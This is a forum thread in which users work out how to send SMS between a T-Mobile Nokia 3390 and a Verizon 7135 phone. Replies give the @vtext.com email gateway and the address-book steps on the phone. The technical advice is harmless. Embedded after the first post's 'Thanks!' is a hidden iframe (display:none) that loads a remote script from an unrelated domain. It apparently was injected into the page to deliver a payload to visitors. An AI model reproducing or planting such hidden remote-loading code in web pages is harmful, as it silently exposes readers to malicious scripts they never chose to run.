+ Reply to Thread

SMS Inter-carrier Interoperability

I searched high and low on this site before posting this question, so I apologize in advance if it's already answered somewhere here:

Has anyone tried to send/receive SMS messages between a T-Mobile Nokia 3390 "dumb phone" and a Verizon-based 7135? My wife won't give up her 3390 (likes the interchangeable face-plate), and I WILL get a 7135 when Verizon offers it here, but she won't be happy if she can no longer SMS me. And no, she's not interested in doing the SMS email workaround (unless there's some way to make it as simple as a regular SMS).

I tried this test with a colleague who has a 6035 on Verizon, and it didn't seem to work (in either direction), but any 7135 success stories by chance? Creative workaround ideas are also welcome.

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Yes, it's relatively easy to do (if you use e-mail addresses instead of just phone numbers). As a Verizon subscriber, your SMS address is your phone number (no parentheses or dashes, area code) @vtext.com. I don't know other carrier's addresses, but when you receive one from her, you should see her e-mail SMS address as the sender.
    Hope this helps.
    Mike
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Re: SMS Inter-carrier Interoperability

My wife has a T-mobile phone and we've been seding text messages back and forth successfully. Only problem I have found is that Verizon sometime seems to lose the messages if you have the phone off for a certain period of time.

Thanks KB2PMD and jb40967; if need be, I guess I can train her to punch in the '@vtext.com' part.

jb40967, when you've done this, has it been with or without the email address? If you've figured out a way to do it with just the 10-digit #, I'll owe you one!

[QUOTE jb40967, when you've done this, has it been with or without the email address? If you've figured out a way to do it with just the 10-digit #, I'll owe you one! [/B][/QUOTE]

We've never used email addresses, just phone numbers. For example, on the 7135 phone menu, select messages.

Select New. Select "Tap to enter recipient". For "Action", select Address Book. Choose a name from your address book. It will then display the phone numbers for that contact. Select the ones you want, enter your message and send.

The only limitation here is that the number you want to send to has to be in your address book, you cannot enter it in directly.

My wife has a Motorola v60 on T-mobile. But the process is also similar.